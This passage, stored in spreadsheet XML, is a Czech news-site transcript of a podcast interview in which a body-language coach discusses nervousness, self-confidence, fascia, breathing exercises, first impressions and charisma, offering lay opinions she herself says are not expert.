Autor: Expres.cz || Expres.cz | 1. prosince 2024 | 23:30</t>
  </si>
  <si>
    <t>20241201_60_3482400930_cb5cece5314e9a76e765.html</t>
  </si>
  <si>
    <t>cb5cece5314e9a76e765</t>
  </si>
  <si>
    <t>Expertka na řeč těla: Tenhle orgán vám krade sebevědomí! Zbavte se nervozity za 5 vteřin</t>
  </si>
  <si>
    <t>Expertka na řeč těla: Tenhle orgán vám krade sebevědomí! Zbavte se nervozity za 5 vteřin Katko, pokud budu nesebevědomý člověk, poznáš to na mně? Pokud jo, co mě prozradí jako první? Já nepoznám, jaký jsi ve skutečnosti, ale můžu poznat signály na tvém těle, že momentálně teď se necítíš sebevědomě. Ale jsou lidi, kteří jsou sebevědomí, ale třeba i snaživost udělá to, že já na jejich těle poznám jakoby tu nejistotu, tu snaživost, a to má podobný klíč jako to nesevědomí, takže já to budu klíčovat jako nesebevědomí vlastně. Kateřina Janečková , herečka a průvodce řečí těla, dnešním hostem Neurazitelného podcastu.Vítej. Ahoj, zdravím. Jaké signály to jsou? Každý z nás má nějakou svoji komfortní zónu nebo víc komfortních zón, a to znamená, že když my jsme v bezpečném prostředí se svými přáteli nebo s lidma, které máme rádi, cítíme se tam uvolněně, tak to tělo na té uvolněné bázi funguje a dovolíme si udělat i nějaký větší pohyb hlavou, klidné ruce máme třeba, hlasy na nějaké úrovni. A jakmile se ocitáme v nekomfortní zóně, v nějaké stresové třeba, jako před lidma mluvit nebo jsem v nějakým prostředí, kde mně s těma lidma není dobře, tak skrz fascie v mozku, který cítí tady tohleto jako nervozitu nebo někdy tu snaživost, jsem na castingu a chci vyhrát, takže vlastně ten nádech toho adrenalinu, tak to tělo chytá automaticky v tom napětí buď rychlejší pohyby, křečovité, chaotické gesta, nebo jsou takové monotónní intonace, protože je tam ta sebekontrola, nebo naopak opatrnost, jo. A některý lidi úplně naopak skřečnou a přestanou se hýbat a mluví tak, že to tělo se vůbec nehýbe, takže to jsou takový hlavní signály, že já poznám, jestli ty lidi jsou takzvaně na svalové úrovni ve své autenticitě, anebo jestli už tam je ta svalová křeč nějaká. To znamená ten mozek řeší něco, vysílá skrz ty fascie ještě něco jiného než tu uvolněnost. No, mně to občas přijde, že se sice bavíme o řeči těla, ale že bychom možná měli používat spíš křeč těla. No, ano.Ty jsi zmínila to slovo fascie. Můžeš prosím tě vysvětlit co to je? Já teda nejsem odborník vůbec na fascie, ani na takovýhle věci. Ale fascie, jak je maso třeba, když koupíte, tak odřezáváte takový ty bílý šlašky, i v carpaciu jsou takový nitky jenom toho. A vědci, nedávno teda, já, když jsem viděla ten dokument asi před rokem a půl, tak jsem o tom nikdy předtím neslyšela, byť jsem i předtím učila o těchto věcech, tak vlastně mně tady ten dokument pomohl v tom si uvědomit aha, ono to fakt je i anatomicky dle toho těla a hraje mi to takzvaně na notu, protože já jsem s těmahle věcma pracovala dřív, aniž bych věděla, že to dělají fascie, takže mně to pomohlo, že od té doby to používám, ale říkám, nejsem v tom odborník, takže se omlouvám, jestli to neřeknu úplně nějak dokonale. Ale čistě laicky prostě ta fascie nám obepíná celej mozek úplně všude a vysílá ty signály skrz krk, tělo, obepíná nám veškerý orgány, páteř, všechno. A je to tzv. přenašeč informací v podstatě. To, že my mluvíme a hýbou se nám automaticky ruce nebo tak, je přesně skrz ty fascie, že to tam jako lítá a my na to nepotřebujeme přemýšlet, jo. No a ty fascie vědci uznali údajně jako smyslový orgán další, což mě úplně fascinovalo, fascie, fascinující, protože oni vlastně samozřejmě reagují i na nějaké genetické podněty a podobně, reagujou i na to, když jsme někde zranění, tak tam se najednou ten tok přeruší, že jo, a tak. A reagují na naše emoce a pocity. To znamená já, když jsem na castingu třeba, nebo jdu na nějakej pohovor, na rande, cokoliv, na nějaký rozhovor s někým blízkým, s kým vím, že ten rozhovor bude třeba těžší a je to nějaká hádka napůl nebo něco, tak náš mozek, ta emoce, ten pocit, který já mám vevnitř, který je nekomfortní, třeba je trošku stresovej, tak ta fascie to přenese na tu svalovou úroveň a to tělo vlastně, ona se jako stáhne a tím pádem nám stáhne i to svalstvo a pak se hodně lidem děje, že většina lidí, když se na ně podíváš, kteří jsou nervózní nebo snaživý, tak takhle jim zatuhnou ramena a krk a pohybujou se, takhle kývou nebo takhle hrudníkem, ale ruce vůbec nezvednou, lokty vlastně od hrudníku. Podvědomě ten dech, jak se nám skřípne nahoru, tohleto je snaživost, musím to vyhrát, anebo je to taky Ježíš Maria , já se bojím, ať už to mám za sebou. A tím my si skřípneme ten hrudník, ruce nám jdou k tělu a pak lidi ručkují takhle, já tomu říkám jako tučňáčci prostě.No, a co s tím teda? Dá se nějak pracovat, nebo takhle. Když jsem začal tu otázkou na sebevědomí, tak jo, jak vlastně je sebevědomí propojené s naší řečí těla? Jak moc je to vzájemně ovlivnitelné a jak moc je to provázané? Já si myslím, že hodně. A je to právě, já dost pracuju s lidma jako individuálně vlastně, protože není jeden klíč obecnej, jo, ale prostě každý z nás má nějaký jiný vzorce, ve kterých vyrostl, každý z nás má jiný hodnoty v tom životě, a záleží jako nejdřív rozklíčovat ty naše různý vnitřní sabotéry, kritiky, což dělají třeba jiní lektoři než jsem já, ti zaměření na tu mysl, a já jsem spíš ten člověk, který to odblokovává na té svalové úrovni právě. To znamená, my prostě sebevědomí, já to neberu spíš tou myslí, tou hlavou, ale sebevědomí cítit se v tom těle jako dobře a příjemně i v těch nepohodlných situacích a dovést se o to tělo opřít. Protože já jsem zastánce takové té myšlenky, že tělo a mysl by měly být fakt v rovnováze a oba dva jsou důležitý, obě dvě ty věci jako k realizaci toho mozku a duše, jo. Ale jako já mám takovou představu, že prostě mozek a duše je ten vyšší level, ale on je čistý, oni jsou čistý, když se jako rodíme, máme tam nějaký genetický dispozice a to, ale naše životní zkušenosti od nás samotných tam teprve nahráváme. A my máme nějaké prvotní bloky třeba v dětství, nějaké první trapasy a podobně, a náš plazí mozek někdy, který prostě se najednou rozhodne tenhle nezdar a tenhle trapas zakódovat do těla, že to je ohrožující na životě, tak už se to dostává na tu svalovou úroveň. A my potom se ocitáme v situacích, kdy se může takzvaně opakovat něco, já dám příklad, teď nemluvím obecně. Jsem třeba prostě na písečku, je mi sedm let, hraju si tam s dětma, je jich tam víc, a najednou si vezmu kýblíček, vezmu lopatičku, a dojdu za chlapečkem, támhle si chci postavit hrad. Ještě vůbec nic nevím o sexualitě, o ničem, ale prostě už tam něco geneticky, muž a žena, rodina, hrát si na maminku, na tatínka. Přijdu k chlapečkovi, on mi vezme tu lopatičku, majzne mě s ní o hlavu prostě a utíká s mým kyblíčkem k vedlejší holčičce a začnou spolu stavět hrad. Tak co udělám já jako sedmiletá? Prostě nejenom že mi vzal ten kyblíček, ale ještě mě ublížil, mám bouli, a ještě ty moje věci dá jako jiný holce. Vám je potom 13, 15, první rande, a vy už si vědomě na úrovni mysli nepamatujete tenhle zážitek třeba, ale vaše tělo tehdy ohodnotilo, protože to bylo tak silně emocionální pro vás, že pozor, jakmile mně se líbí nebo si chci něco začít s nějakým klukem, tak je to ohrožující situace, může tě to bolet, může ti někdo ublížit a ještě ti něco odnést prostě. To znamená, ten mozek řeší tyhlety věci buď jako útok nebo útěk. Když jsem v útoku, tak si postavím ty chlapy za něco jako nebezpečnýho a začnu říkat já je nepotřebuju a oni jsou takoví, prostě začnu se tomu bránit a hodím si tu masku té obrany a budu si dokazovat, že je nepotřebuju, že oni jsou prostě něco míň než já. A ten útěk je že se stáhnu a budu si říkat to nemá smysl, ona stejně každá je hezčí než já, já za to nestojím a prostě.... Jo, a tyhle kódy my lidi neumíme, pak je nám 40 a my furt máme problémy se vztahama nebo s nějakým randěním, protože naše tělo žije tu zkušenost osmileté holky, aniž my bychom to vlastně jako věděli. A já pracuju s lidma tak, že se jim snažím na bázi těch fyzických bloků, které jsou někde jako zanesené, jim to rozpustit a oni vlastně jak se začnou v tom těle cítit líp, tak najednou když už jdou do té stresové situace, třeba na rande, tak já je naučím ty fascie nenechat stáhnout, to tělo, tak to odříznu jako dvě složky a oni se začínají cítit uvolněněji a teď se v tom začnou cítit sebevědomeji a najednou zjistí, že jinak přemýšlí, že ti sabotéři už jim tam tolik jako neskáčou a podobně. A tam potom nastává to, že se jako můžou začít cítit třeba sebevědoměji. Ale to tělo je opravdu něco, co je X desetiletí a vlastně možná století jsme učení v tom ho opomínat, že dáváme jako daleko větší pozornost té mysli, ale my si neuvědomujeme, že ta mysl nám potom zamezuje abychom se o to tělo opřeli, jo. Když já budu mít třeba z něčeho depresi, někdo mi umře nebo prostě se se mnou někdo rozejde, tak já jako herečka večer hraju, já nemůžu říct já nejdu hrát. My herci jsme vycvičení prostě jako vojáci, pokud neumíráme, tak nám prostě dají nějaký kapačky v nemocnici, odvezou na natáčení, my to natočíme a pak nás odvezou domů. Ale pokud nejsme na smrtelném loži prostě, tak jako neexistuje výmluva. Tam se počítá, že herec s těmahle věcma prostě musí se naučit takhle jako pracovat, i když jsem nemocná, mám angínu, prostě jdu hrát. No, takže když bych se zeptal na dvě věci. Zaprvé, je teda cesta, protože většinou se to bere tak, že abych mohl dosáhnout nějakýho sebevědomí, tak musím chodit na terapie, probírat všechny tyhlety situace s těma bábovičkama a hradama a pak po několika letech, když se mi podaří si nějak tu hlavu trošku uspořádat, tak můžu začít vypadat sebevědomě i fyzicky. Ale z toho, jak to vyprávíš, tak mně přijde, že za prvé teda můžeme na to sebevědomí jít i přes to tělo a nečekat, byť teda to klidně doplnit tou terapii, ale nečekat 10 let, než zabere třeba. A druhá věc, jestli se teda dá sebevědomí fejkovat, což je odpověď, která by mě hodně zajímala, když mi bylo třeba 15, ale ona mě hodně zajímá i teďka teda. No jasně. Spousta lidí sebevědomí fejkuje jako tím, že, já nevím, na škole jsou to třeba takoví ti machýrci, šikanátoři a podobně, jo, ale když si to tak vezmete, tak to je jenom zase potřeba přežít toho plazího mozku, takže zase si někdo zvolil útok nebo útěk a on si zvolil útěk. Ale je to vlastně snaha přežít, ta se srovnává s ostatními a je to zastrašování, takže to vypovídá o tom, že já nejsem vevnitř jako v rovnováze a vyrovnanej, protože kdo je v rovnováze a vyrovnanej, tak nemá potřebu vlastně útočit, že jo, nebo utíkat. Takže spousta lidí ano, fejkuje sebevědomí. A jsou o tom ale třeba přesvědčení, ani si neuvědomujou myslí, že ho fejkujou. A jak se to třeba dělá takový fejkování sebevědomí? Abychom to dokázali rozeznat. Kromě toho, že je teda někdo namachrovanej nebo... Jak se to dělá, říkám, to záleží. No je asi víc lidí, kteří to fejkujou vědomě, a pak lidi, který to fejkujou nevědomě. Já znám spoustu lidí, kteří potřebujou třeba, mají tu práci takovou, a jako i ti herci třeba někteří, o hercích si každý myslí, že jsou to jenom exhibicionisti všechno, jako extrovertní, ale spousta z nich jsou fakt introverti, kteří prostě mají šílenou trému před představením nebo někam vyjít. A ty třeba umějí právě nafejkovat to, že to na nich nepoznáte vůbec, ale to je to, že oni umějí pracovat s tím tělem tak, že vy to nepoznáte. Ale pak jsou ty lidi, kteří jsou v jakési té obraně a potřebujou si něco dokazovat a dokazovat těm ostatním a ty prostě jsou třeba ty agresoři nebo jako mačisti takoví, který potřebujou ty ostatní trošku, jako být nad nima, a ty si to kolikrát vůbec jako, ty si myslíš, že to je sebevědomí, ale vlastně si to ani nezvědomí, že to je nesebevědomí. No a jak teda můžeme ty fascie, já nevím jak moc tady můžeš něco ukázat nebo to, ale byla jsi nervózní dneska před rozhovorem, Já se přiznám, já už jako nejsem nervózní moc, ani ty pocity trapna. A jako takhle, jsem, cítím někdy ty trapna a to, ale já už si to opravdu držím na té úrovni, že mě to tak jako zalechtá, když jsem někdy nervózní víc, tak už to umím jakoby odepnout. Ke mně chodí třeba hodně, čím dál víc klientů jako odnaučte mě to prostě, abych se cítil trapně, abych byl nervózní, abych se styděl. Já říkám ono to nejde, jako to hlavně klíč k tomu je, že pokud my chceme se to odnaučit, tak chceme popřít nějaký prostě přírodní daný věci, že jo. To je vlastně nějaký pud sebezáchovy v tom, že my jsme nervózní, nějakej adrenalin, ty emoce jsou vlastně velmi zdravé a je to takzvaně jako hnací motor. Kdyby nám bylo všechno jedno, tak jsme jako patologicky nemocní, že jo, nějakým svým způsobem, ty emoce tady prostě k něčemu jako jsou, že jo. A já jim vždycky říkám, v první řadě je klíč přijmout že jsem nervózní a nesnažit se dělat že nejsem, nestydět se za to. Přijmout že se cítím trapně a přijmout třeba i to, že se snažím. Hodně lidí jako maskuje, že se snaží a hrajou si na takový to jako já jsem tady na ten casting, no tak já jedu napůl plynu, kdyby náhodou se jim to nelíbilo, tak prostě aby jako cítili, že já pojedu na 100 až když mě vezmou. Jo, ale to je vlastně přesně taky druh nějaké jako nervozity nebo něčeho. Teď jsem ztratila linku trošku, na co jsem odpovídala? Jestli jsi byla nervózní před dnešním rozhovorem. Jo, a já jim právě jako, učím je ladit v tom, aby oni to přijali i třeba tu snaživost a všechno a nechali si jí v té hlavě, protože je zdravá, protože je to fajn. Ale odepli to od toho těla tím, že se dostávám do té svalový křeče, to znamená, že mi to začne ovládat i to tělo. To je potom nepříjemný, protože my to samozřejmě vnímáme, že to tělo nás neposlouchá, že nám bije srdce, že jinak dýcháme, pak lidi mluví v jiných hlasových polohách. Všimněte si, když je někdo nervózní, opatrnej, tak většině lidem vyleze hlas takhle, takže já bych přišla, začala bych říkat dobrý den, já jsem Katka Janečková, jsem ráda, že jste mě pozval. Víš, jako ono se to vlastně pak projevuje na takových, takže ano, jsem kolikrát nervózní, ale musím přiznat, že méně a méně a méně a méně. A co bys mi poradila? Protože já jsem byl nervózní před tímhle podcastem, jako jsem před každým podcastem, tak co bych mohl udělat v tu chvíli pro to, abych nevím, jestli odepnul, ale třeba se cítil o něco klidnější, že mě to tělo poslouchá? Já vždycky říkám lidem, aby se naciťovali takzvaně, umět se jako do sebe, do svého těla opravdu podívat tím vnitřním zrakem. To znamená, když ty se pak sleduješ v nějakých těch komfortních zónách, když jsi v pohodě a o nic ti nejde, třeba když jenom tak sedíš u stolu tady v kavárně s kamarádem a nenahrává se to, jakým způsobem ty dýcháš, jak sedíš, jak ti ten hlas mluví, co dělají tvoje ruce. A nasledovat potom když jsi v těch nervózních situacích co se kde mění, jo. Jsou lidi, kteří umí to tělo vnímat, to znamená ty pak rychle mají jakoby ten proces prostě, že to dokážou uchopit, a jsou lidi, kteří ho fakt neumějí jako vnímat a vůbec neví, že se dýchá do břicha, do hrudníku zvlášť třeba, ještě k tomu do beder se dýchá zvlášť a do močovýho měchýře. A oni prostě jim řeknou nadechněte se do hrudníku a ne do břicha a oni nevědí jak, jakýma svalama jo. Tak to je potom samozřejmě potíž a pak je potřeba s nima víc pracovat, abych je vůbec naučila jako umět se dívat do toho těla, do těch svalů, a umět je opravdu ovládat vědomím a ne jenom tím, co ta fascie přenese z toho mozku, prostě z těch stresových těch. Tzn v první řadě všechno závisí nad dechu, i to, co jsem říkala na začátku. Jak se nám skřípne ten dech, tak už začneš sledovat, že ty ruce, a ta moje metoda, co já dělám, tak v prvním lekci všem individuálně uvolňuju právě tady tyhlety jako trapézy, a to, ale vlastně ty fascie pod nima, že jim takzvaně odepnu ty ruce a říkám jako kdyby vám je ujel vlak a prostě byste je neměli a máte nějaký jako implantáty nebo něco, který jsou fakt na provázku, visí dvě dřeva nebo plasty, a vy jak se hnete ať se hnete tak ty ruce jenom plandají. A zjišťuju, že opravdu téměř 100 procent lidí, když ten cvik dělám, jako že jim to odepínám ty svaly, tak nejsou schopný zjistit které to jsou a neumí to uvolnit, protože jim zasahují do velmi intimní zóny tady těch bloků, protože tady přes tohle to jede do toho těla ty fascie a to tělo je najednou, ta hlava v panice, že do toho někdo sahá. A oni mají tendenci jako jít proti tomu, to znamená já, když se jich dotknu, tak oni už udělají tohle, jo. To je prostě 1 cm a paradoxně já, když budu mít trému nebo přijdu i sem na podcast, tak jakmile mám tu nervozitu na té tkáni svalové, tak ten dech té nervozity udělá tohle. Já nevím, jestli to bude vidět na tu kameru, ale je to fakt jako centimetr a já začnu mluvit takhle. Teď ty fascie mám chycený a teď ne, teď jo, a teď ne. Jo, tak sám vidíš, že to je centimetr, kterej u cizího člověka ty nepoznáš na první pohled. Já jo, protože už to prostě dělám jako delší dobu, už to jsem schopná vidět, ale spíš podle toho pohybu. To znamená, ty lidi naučím tuhletu trasu ukázat, jako aby se na ní uměli koukat, aby to uměli fakt vypínat ten sval, a mám takových pár cviků, ale to jako je jich víc, protože individuálně je na každýho jinej. Někdo třeba v tom stresu zatíná zadek, někdo nohy, někdo krk jinde, jo, prostě přesně, to znamená jak mám jako ten dar takovej nějakej, že malý procento populace mám prej tady tu diagnózu a dar. A já jí mám, že do té svalové úrovně jakoby vidím, takže já jim každýmu dám konkrétní na něj cviky, kde on to má, kudy mu to proudí nebo neproudí takzvaně. A naučím to odepnout. Ale první je prostě dech a druhý je odpoutat si ty ramena, procvičit to, což je skvělý chytit si za zápěstí, já nevím, pravé ruky levou, opravdu se jako vytáhnout a zacpat si až uši těma ramenama v podstatě. Hodně se v tom rozšíří ten hrudník a tohle všechno, a to až skoro bolí, když to opravdu natahuješ hodně, a s velkým výdechem to pustit a pak vyklepávat ty ruce, ale nevyklepávat je dolů, ale vždycky nad ten horizont, aby právě se mohlo to, co ta fascie chce stahovat, jakoby protáhnout vlastně a uvolnit to. Takže myslím si, že hlavní část je, u většiny lidí jsou to ramena a ruce. A když vy si do toho sednete a napozorujete si ty komfortní zóny, tak najednou začíná fungovat představivost. Já si třeba představím v tu chvíli, sedím tady s touhle kamarádkou nebo s tímhle člověkem, jsem teďka tady, před týdnem jsem byla někde na dovolené, tak si nacítím to prostředí na té dovolené a začnu s tebou mluvit ten podcast tím, že moje tělo je ještě na dovolené jakoby. A tím člověk zpočátku jakoby trénuje, učí se to tou vizualizací a tou technikou a prostě dechem a podobně. A najednou zjistíš, že to tělo si na to jako zvyká, zvyká, a ty už si pak vizualizovat a nic nemusíš, ty prostě už jako víš kudy kde to jde, objevíš sám sebe v tomhle vevnitř a už si to umíš vlastně zapínat a odepínat, odepínat na lusknutí prstů, takhle. Takže se nachytávat v situaci, kdy je mi dobře, kdy jsem uvolněnej, vnímat co dělá moje tělo, jak se cítí jednotlivé části, a potom se naučit vypínat ramena jako kdyby mi ujel vlak. Mimochodem teda dýchání do močového měchýře, to je novinka pro mě, to si budu muset o tom něco zjistit. Ale jak můžu, nebo přijde mi, že spousta, spousta, spousta lidí přemýšlí nad tím, jak působíme na druhé lidi, co si o nás myslí, co o nás řeknou. Ale jak můžu realisticky zjistit jak na druhé lidi působím? No, protože to, o čem mluví spousta lidí, si bere na té úrovni mysli jak na ně působím, že oni si myslí něco o mně jaká jsem, jaký je můj charakter. A tuhletu v uvozovkách chybu děláme úplně všichni. Jako když sedíme někde v parku nebo na zastávce stojíme a koukáme na lidi, ani si to vůbec neuvědomujeme vlastně, ale vidím někoho tři sekundy a hned si ho ohodnotím. A on si ho ohodnocuje ten můj podvědomý mozek, aniž bych já třeba tomu dala pozornost, já myslím na práci nebo na něco v tu chvíli. A můj mozek mezitím, oči moje uvidí člověka, já si řeknu to je nějaký bezďák, to je nějaká chudinka, támhle to je nějaká sebevědomá, ten je arogantní, támhle sympaťák, jo, ale prostě hned my jako ten vjem vizuální hned zařadíme do toho, že ten člověk takovej je. A to je obrovská chyba, protože naše tělo má na základě nějakých návyků fyzických a zkušeností a rytmu a schůze různých věcí prostě jako moc a sílu působit vlastně úplně jinak než jaká já jsem. Takže já učím lidi právě rozdíl mezi tím subjektivním hodnocením na první pohled a fakt objektivní analýzou. Jsou třeba lidi, které já vždycky přirovnávám, technikáře třeba v divadle, když jsem byla v prvním angažmá v Jihlavě , tak tam byla taková dlouhá chodba, jak jsou ty chodby velký za hledištěm a do kulisárny a tohle, a vycházel prostě jeden ten jako kulisák, a to jsou obrovský chlapi, který chodí, klátí těma ramenama, ruce mají, jako takhle jim trošku visí vedle toho těla, jo, jak když někdo posiluje, jo, tak znáš takový ty borce, co jako mají ty lokty od těla pět cenťáků. Mají dlouhej krok. Proč? Protože na tom divadle, když je nějaká přestavba nebo něco, tak se setmí a ty musíš co nejrychleji přijít, chytnout nějakej gauč, odejít a je konec, hudba, rozsvíceno a herci hrajou. To znamená, oni mají navyklý ten fyzikální projev, takový ty dlouhý kroky a tu klátivou chůzi, jo. Já kdybych takovýho člověka viděla na ulici večer, když jdu z divadla, tak přejdu na druhý chodník nebo už si nahmatávám klíče a začne mi bušit srdce a už si říkám hele, bacha, to je nebezpečný agresor, jo. Přitom když toho technika poznáte, tak najednou zjistíte, že on je to úplně jako fajn člověk a říká ahoj, já jsem tenhle, a my děláme guláš, kdybys potřebovala něco jako opravit v bytě, řekni. Zlatí chlapi prostě, ale na ulici bych zdrhala. A obráceně, jdete kolem nějaké lavičky, kde stojí, někdo sedí, takovej jako chudinka, vám přijde že jako nic, smutnej, a zrovna když procházíte, tak on třeba může vystartovat, tu kabelku vám vlastně ukrást a utéct a vy to vůbec jako nečekáte, jo. Tzn i třeba lidi, baletky, jo, od tří let někdo prostě chodí na balet, tak má to tělo samozřejmě vyosený, narovnaný, návyk toho svalstva takhle, hlava nahoru, dlouhý krk. Ta holka přijde do nějaké třídy nové a všichni Ježiš, ta je namyšlená, ta se nese. A když s ní promluvíte, tak zjistíte, že to je totálně nesebevědomá třeba stydlivá holka. To znamená jako posuzování na první pohled je prostě něco, co náš mozek dělá, není to špatně, ale pokud s tím chceme pracovat vědomě a na základě toho i umět komunikovat pak líp s těma lidma, tak je dobrý jako používat u toho i tu objektivní analýzu. Co znamená objektivní analýza, co si pod tím představit? No, že tomu dáš nejdřív pozornost a opravdu to vyzkoušíš dřív, než to ohodnotíš, posoudíš. Nehledě na to, že máme ještě právě ten plazí mozek, jako ještě dělá takovou věc, že my třeba máme ve školce nějakou učitelku, která se nám jako nelíbila a nemáme ji rádi, jo. Ty už si na střední nepamatuješ ani jak vypadala, možná ani na základce, ale seš třeba ve 40 majitel firmy a najednou přijde prostě nějaká paní a určitě to znáš, nevíš proč a řekneš si tu nechci, ta mě prostě, můžu sprostý slova tedy používat? Ta mě prostě sere, nevím, jako ne, další. Jo, protože ona má třeba frekvenci hlasu, něco mikroskopicky v pohybu podobnýho s tou učitelkou z té základky, a ty si to ani nepamatuješ, ale už cítíš subjektivní nesympatii a než abys zjistil proč jí máš a dokázal jsi to odůvodnit, tak jí prostě pošleš pryč, protože na to nemáš čas, je ti nesympatická, tečka. A pak přijde další paní, kterou ty vezmeš, protože na první pohled to byla ta sympatická z té mateřské školky nebo má mimikrij, něco podobnýho jako tvoje babička, prababička, ty si najednou řekneš jo, ta je milá, tu já chci. Ale ta, co jsi vzal, je třeba v kvalitě té práce, té profese, kterou ty potřebuješ, daleko horší než tam ta, to znamená pro ten proces pracovní jsi udělal základní chybu. Takže nedělat zkratky, ale zkusit se napojit... Já učím lidi zjišťovat co jsou ty vzorce přejaté, co takzvaně nepatří nám, a co jsou ty věci, že k tomu mám opravdu důvod. Většinou se to fakt pozná, když nám něco jako emocionálně úplně vadí, že cítíme tu averzi na to a podobně, tak většinou je to vzorec. Protože jakmile to vychází, to, že nám něco vadí z naší zkušenosti už opravdu, s naším jako vědomím, takovým tím pravým já se říká, nepravým já, že jo, tak někdo si myslí, že pravý a nepravý já jsou, jako nepravý já jsou něco jako nepřítel. Ale jde o to, že to pravý já je právě ten čistej mozek s tou duší, se kterou jsme se narodili a máme tam jenom nějaký genetický kódy a každý třeba nějaký jinej talent a netalent. A to nepravý já je to, jak jsme byli vytvoření tou rodinou, tou školou, těma zkušenostma. A ono když my dva je seznámíme jako kámoše, tak zjistíme, že těch já je tam zaprvé ještě daleko víc všude, a za druhý oni oba dva jsou jakoby potřeba k tomu, abychom přežili. To, že já jsem třeba byla šikanátor nebo nějaká ve třídě může být i tím, že vyrůstám v rodině, která na mě prostě nebyla vlídná a můj mozek si řekl já prostě potřebuju přežít a zvolila jsem tohle jako boj o přežití nebo něco. To znamená, nejde to jako vyčíst je to špatně nebo dobře. A když s tímhle začneme pracovat prostě na vědomé úrovni, tak si najednou i uvědomuješ které ty věci, tvoje názory, jsou fakt převzaté, protože to říkali naši nebo protože to říká můj nejlepší kamarád, protože to říkají lidi ve firmě, ve který já strašně chci pracovat, tak se na ně napojuju, anebo jestli to má opravdu něco společnýho s tím, že opravdu já chci. To znělo hezky, ta myšlenka seznámení mého pravého já a mého nepravého já. A jak můžu teda poznat co je to moje? Dá se to takhle říct? Hele od toho jsou zase jiný kurzy a jiný. Já se přiznám, že já právě asi před dvěma lety, jak mně začínali na ty kurzy už dřív chodit různí terapeuti z různých druhů oborů, tak mě začali oslovovat právě ke spolupráci hodně, protože nemají kolem sebe lidi, kteří pracujou skrz to tělo a věří tomu, že právě je to velmi důležitá součást. To znamená, oni začali chodit na moje kurzy, aby to poznali, já začala chodit na jejich, a tím jsem se dostávala i já k nějakým svým terapiím, že by mě v životě nenapadlo třeba tam jít sama od sebe a musím říct, že jsem z toho úplně nadšená. Ale na tohle téma poznávat třeba pravý, nepravý já, je úplně spoustu jako jiných. Mě třeba hodně fascinovalo, jsem vůbec neznala v poslední době, human design, jo, taky zajímavá metoda. Nebo jsou fakt různý druhy koučů a věřím tomu, že každý z nás je potřeba, aby jako hledal, že se to nedá doporučit, protože to, co bude vyhovovat mně, tak já jsem jiná, že jo, nemusí vyhovovat tomu blízkýmu nebo někomu, komu to doporučuju. A je potřeba prostě ne že něco zkusím a narazím třeba zrovna na člověka se kterým se nesednem, tak řeknu ne, to je blbost, ale třeba zkusit ještě další 2,3 lidi. To je jak s fyzioterapií, jeden mi nepomůže, tak řeknu, že to je naprd prostě. Ale když pohledáte 12345, tak třeba šestej bude ten, který s váma opravdu hne. A mám třeba i tuhle konkrétní s terapeutama, fyzioterapeutama zkušenost, takže tímhle já se nezabývám, ale zabývají se tomu a je to velmi zajímavý jako jiní zase terapeuti. Dobře. Já musím říct, že celý ten dnešní rozhovor je pro mě takový hodně osobní téma, protože vezmu třeba téma charismatu, že mně vždycky bylo říkáno, no, ono z těch druhých lidí něco vyzařuje a oni mají to charisma a z tebe to nevyzařuje. A mě to vždycky strašně sralo. Protože když ti někdo řekne, že seš tlustá a měla bys zhubnout, nebo že máš vlasy jako mánička a měla by ses ostříhat, tak se s tím dá něco dělat. Ale když ti někdo řekne, že něco nevyzařuješ, co s tím, že jo? A mě dostala jedna věta na přednášce tvojí, na které jsi byl, kde jsi říkala, že s charisma se rodíme všichni, pak o něj přijdeme. Jak se to stane? No, takhle jsem si to teda načetla, protože já jsem na nějakým kurzu vlastně začala spontánně mluvit o charisma a teď to ze mě tak jako, jsem to tam vychrlila, a pak jsem jela domů tím autem a říkám Ježíš, já tady mluvím o nějakých věcech, že teď mě to tak jako napadlo, ale já vlastně vůbec nevím, jestli je to pravda. Tak jsem se vyděsila a doma jsem začala googlit charisma a tak a opravdu jsem si jako přečetla, že jsem to jako vycítila správně vlastně v nějaké míře. A prostě údajně charisma je něco, co opravdu se s tím narodíme všichni, a to je podle mě ta uvolněnost té autenticity toho mozku a duše, se kterou se jakoby narodíme. Ono charisma není něco, jakože ty lidi, co jsou charismatický, vypadají stejně nebo je to nějaká forma komunikace, vyjadřování se, jo. To může být jeden charismatický člověk, který je kamenná tvář a mluví úplně ploše, druhý charismatický může být nějaký hiphoper prostě, třetí může být Květa Fialová , nevím, jo, ale nikomu se nemůže stát, že celej svět na něm řekne ten je charismatický. A to je právě to kouzelný, proč jsme každej jinej, a dle těch vzorců a vlivů toho, jakej mám vkus, co se mi líbí nebo nelíbí, jsme každý originál a máme právo na to mít jiný názory, jo. Ale já když řeknu hele, tohleto je charismatický člověk, tak můj muž nebo kamarádka řekne tohle? To ses zbláznila. Ale co to je? To charisma je právě to, že my, jak se začínáme přizpůsobovat tomu vlivu té rodiny, rodičů, školy, srovnávat se s ostatníma, začít mít nějaký vzory, ke kterým vzhlížíme, tak se najednou snažíme být jako oni. My to myslíme hezky všechno, jo, ale i rodiče to s náma myslí hezky, že nám něco vnucujou, ale právě tím se oddalujeme jakoby od toho svýho a zapomeneme na to svoje charisma. My se začneme přizpůsobovat těm ostatním vlastně a pak je to, že se ho musíme znovu učit ale sranda je vždycky když se zeptám těch lidí, představte si někoho s tím charisma a řekněte mi co dělá jako že na vás působí. Tak jako nevím, no, tak mluví tak jako zajímavě, má hezkej hlas. A říkám, ale co pro to dělá? A oni řeknou no nic. Jako říkám tak, to je to nic. Vlastně to charisma je zase druh energie a frekvencí, kterou to tělo vysílá, a to je ten druh toho klidu, že vy na tom člověku cítíte, že on se může vztekat, on se může smát, on může být neutrální, obecnej, smutnej, ale prostě z něj cítíte ten klid, že on je sám sebou ve své nějaké autenticitě jakoby, jo, že tam právě není ta křeč té snaživosti, nervozity, nepotřebuje se srovnávat s těma ostatníma, je připravený na tu kritiku vlastně. Jestli mu někdo jako teďka řekne že něco je špatně nebo dobře, jemu to může být líto, ale přijme to vlastně, jo, nenechá se tím rozhodit vyloženě nějakým způsobem. To znamená, myslím si, že je to součástí toho, že charismatický lidi jsou často fakt jako v nějaké rovnováze právě mezi tím tělem a duší. Někdo se mě na to taky někdy zeptá jako no jo, ale vždyť to nemusí být vždycky jako hodní lidi, poctiví a tohleto, můžou to být taky pěkný jako někdy mrchy nebo podvodníci. Já říkám no, vždyť jo, a to je potom ta manipulace, že jo. Když dobře umíte prostě propojit tělo a mysl, tak je na vás, jestli to použijete jako do nějakých pozitivních kladných hodnot v tom životě, anebo jestli toho zneužijete a budete prostě manipulátor nebo podvodník. Ale to už já nehodnotím nebo nesoudím, to už je na každém, jak s tím zachází. Ale úlet je to, že prostě spousta lidí neumí to použít vůbec, jako my s tím neumíme pracovat, my neumíme srovnat to tělo a mysl. Je tam takový zajímavý 